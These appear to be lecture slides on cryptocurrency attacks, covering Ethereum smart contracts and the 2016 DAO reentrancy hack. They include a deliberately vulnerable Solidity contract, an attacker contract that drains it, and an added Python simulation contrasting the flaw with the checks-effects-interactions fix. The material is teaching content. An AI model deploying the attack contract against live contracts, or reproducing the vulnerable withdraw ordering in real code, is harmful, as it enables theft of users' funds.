More Cryptocurrency Attacks

http://blockchain.unica.it/projects/ethereum-survey/index.html
http://hackingdistributed.com/2016/06/18/analysis-of-the-dao-exploit/
https://hackernoon.com/what-caused-the-latest-100-million-ethereum-bug-and-a-detection-tool-for-similar-bugs-7b80f8ab7279

Last Class
• Majority attacks
• Block withholding attacks
• Spam attacks
• Sybil attacks
• Blacklisting
• Fungibility
• Money laundering

Last Class
• With the rise of 51% attacks:
  • why? to what end?
  • when will this stop?
• What are the points of centralization in this network?
• Is this inevitable?

Cryptocurrencies
• First altcoin: Bitcoin testnet
• Second altcoin: Namecoin (DNS system)
• …
• over two thousand altcoins/tokens/etc.

But… why?
• Improvements to Bitcoin
• Alternatives to Bitcoin
• Other functionality complementary to Bitcoin
• Make money for founders

But… how?
• Altcoins: have their own blockchain
• Tokens: built on top of cryptocurrencies

Alternative Proof of Work Mechanisms
• Cuckoo Cycle
• etc.

Alternative functionality
• NameCoin: DNS system
• Ethereum: Turing complete
• ZCash/Monero/others: “Private”

Namecoin
• “completes” Zooko’s Triangle
• Blockchain-based DNS
• First fork of Bitcoin
• Merge mined with Bitcoin:
  • same hash function
Ethereum
• Currently the second most popular cryptocurrency
• First proposed as a system built on top of Bitcoin
• Started to create Turing-complete money contracts (“smart contracts”)
• Ether: currency which is input/output to contracts
• Gas: execution cost of instructions

Smart Contracts
• Run on blockchain and executed by all nodes
• Created by posting a transaction
• Identified by address
• Can hold, receive, and send money
• Once deployed, cannot be changed

Ethereum uses
• DApps
  • Distributed applications
  • CryptoKitties!
  • Ponzi schemes!
• Tokens
  • https://coinmarketcap.com/tokens/views/all/

The DAO
• Crowdfunding platform
• Envisioned as a leaderless organization
• Anybody could hold DAO tokens
• DAO creators together agreed on rules
• Raised 12.7M Ether ($150M)

Simplified DAO
• Solidity:
  • high-level programming language to write smart contracts with
  • python-ish
• Enter contract: donate
• Exit contract: withdraw
• Fallback option:

Simplified DAO

    contract SimpleDAO {
        mapping (address => uint) public credit;

        // enter the contract: the ether sent with the transaction is credited to `to`
        function donate(address to) {
            credit[to] += msg.value;
        }

        function queryCredit(address to) returns (uint) {
            return credit[to];
        }

        // exit the contract: the ether is sent first, the credit is updated afterwards
        function withdraw(uint amount) {
            if (credit[msg.sender] >= amount) {
                msg.sender.call.value(amount)();   // external call hands control to msg.sender
                credit[msg.sender] -= amount;      // bookkeeping only runs once that call returns
            }
        }
    }

Attack

    contract Mallory {
        SimpleDAO public dao = SimpleDAO(0x354...);   // address of the deployed SimpleDAO
        address owner;

        function Mallory() { owner = msg.sender; }

        // fallback: runs whenever Mallory receives ether, including from SimpleDAO.withdraw
        function() {
            dao.withdraw(dao.queryCredit(this));
        }

        function getJackpot() {
            owner.send(this.balance);
        }
    }

Step 1: Attacker donates ether for Mallory. This triggers Mallory’s fallback.
Step 2: Mallory’s fallback calls the withdraw function.
Step 3: The withdraw function then invokes Mallory’s default again via call.
Step 4: We then attempt to withdraw again. The last call to withdraw was interrupted before it could update the credit field, so we still have ether to withdraw!

• We can repeat ad nauseam until:
  • contract gas is exhausted OR
  • balance of DAO is zero.
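A runnable model of the re-entrant withdraw walked through above, added here as an example; it is not part of the lecture slides or of the original SimpleDAO/Mallory code. Python objects stand in for contracts, a dict for ether balances, and a method call for an external call that can re-enter its caller; a `max_depth` counter is the stand-in for the EVM gas / call-depth limit, and the scenario (an honest depositor with 5 ether, Mallory funded with 1) is constructed. Beside the vulnerable ordering it shows the checks-effects-interactions fix, which debits the credit before the external call.

```python
"""Toy model of the SimpleDAO reentrancy: contracts are Python objects, a dict
holds ether balances, and an external call is a method call that may re-enter
the caller. Added example, not the lecture's code."""


class Ledger:
    """Ether balances keyed by account (a string for a user, an object for a contract)."""

    def __init__(self, balances):
        self.balance = dict(balances)

    def get(self, who):
        return self.balance.get(who, 0)

    def transfer(self, src, dst, amount):
        # A value transfer the sender cannot cover fails instead of reverting the caller
        if self.get(src) < amount:
            return False
        self.balance[src] = self.get(src) - amount
        self.balance[dst] = self.get(dst) + amount
        return True


class Dao:
    """Shared plumbing; the two subclasses differ only in the statement order inside withdraw()."""

    def __init__(self, ledger, max_depth):
        self.ledger = ledger
        self.credit = {}
        self.depth = 0              # nested external calls currently in flight
        self.max_depth = max_depth  # constructed stand-in for the gas / call-depth limit

    def donate(self, sender, to, value):
        assert self.ledger.transfer(sender, self, value)  # msg.value arrives before the body runs
        self.credit[to] = self.credit.get(to, 0) + value

    def query_credit(self, who):
        return self.credit.get(who, 0)

    def call_value(self, to, amount):
        """msg.sender.call.value(amount)(): move ether, then run the receiver's fallback.
        Like a low-level call it returns False rather than reverting when the DAO
        cannot pay or the depth cap (our 'out of gas') is reached."""
        if self.depth >= self.max_depth or not self.ledger.transfer(self, to, amount):
            return False
        self.depth += 1
        try:
            to.fallback(self)
        finally:
            self.depth -= 1
        return True


class VulnerableDao(Dao):
    def withdraw(self, sender, amount):
        if self.credit.get(sender, 0) >= amount:
            self.call_value(sender, amount)                          # interaction first ...
            self.credit[sender] = self.credit.get(sender, 0) - amount  # ... effect second: re-entrants see stale credit


class FixedDao(Dao):
    """Checks-effects-interactions: debit the credit before handing control away."""

    def withdraw(self, sender, amount):
        if self.credit.get(sender, 0) >= amount:
            self.credit[sender] = self.credit.get(sender, 0) - amount
            if not self.call_value(sender, amount):
                self.credit[sender] += amount  # failed send: undo the debit (Solidity would revert instead)


class Mallory:
    """Fallback re-enters withdraw() while the outer withdraw() is still running."""

    def __init__(self, dao):
        self.dao = dao

    def fallback(self, _caller):
        amount = self.dao.query_credit(self)
        if amount > 0:
            self.dao.withdraw(self, amount)


def run_attack(dao_cls, max_depth):
    """Constructed scenario: an honest user deposits 5 ether, the attacker funds
    Mallory with 1. Returns (DAO balance, Mallory balance, Mallory's credit)."""
    ledger = Ledger({"honest": 5, "attacker": 1})
    dao = dao_cls(ledger, max_depth)
    mallory = Mallory(dao)
    dao.donate("honest", "honest", 5)
    dao.donate("attacker", mallory, 1)
    mallory.fallback(dao)  # Step 1: a payment to Mallory fires its fallback
    # In Solidity the uint credit would wrap around instead of going negative
    return ledger.get(dao), ledger.get(mallory), dao.query_credit(mallory)


if __name__ == "__main__":
    print("vulnerable, stopped by gas cap :", run_attack(VulnerableDao, 4))    # (2, 4, -4)
    print("vulnerable, DAO drained        :", run_attack(VulnerableDao, 100))  # (0, 6, -6)
    print("fixed                          :", run_attack(FixedDao, 4))         # (5, 1, 0)
```

With a credit of 1, the vulnerable contract pays Mallory once per nesting level until either the depth cap or an empty DAO makes the inner call fail, and only then do the pending decrements run, leaving the credit negative (wrapped, in Solidity). The fixed ordering pays exactly once because the re-entrant query already sees a credit of 0.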
But wait!
7 days before drain started
5 days before drain started
• Code was attacked after it was patched.
• But how can that be?
• Remember: once deployed, cannot change

Ethereum Price Shock

Forks
• Fork: update in software
• Hard Fork
  • requires software update; old version incompatible
• Soft Fork
  • old version compatible with new software

What to do next with Ethereum?
• Nothing
• Gas limit
• Ban spam addresses
• Soft Fork
• Hard Fork

What happened next
https://www.ofnumbers.com/2016/07/28/ethereum-core-and-ethereum-classic-for-dummies/

Parity Multisig
• Ethereum Wallet
• One person “killing” a wallet killed every wallet that relied on the contract

Questions
• If we can’t secure code in a normal case, how will we be able to secure it on a blockchain?
• Do new blockchains create decentralization or centralization pressures? How?